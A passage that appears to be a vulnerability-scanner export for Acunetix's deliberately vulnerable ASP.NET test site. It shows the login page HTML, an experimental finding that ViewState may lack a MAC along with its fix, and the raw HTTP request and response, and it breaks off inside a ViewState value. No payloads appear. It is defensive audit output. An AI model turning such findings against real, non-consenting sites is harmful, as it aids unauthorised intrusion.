<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 30393Response body (30393 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzI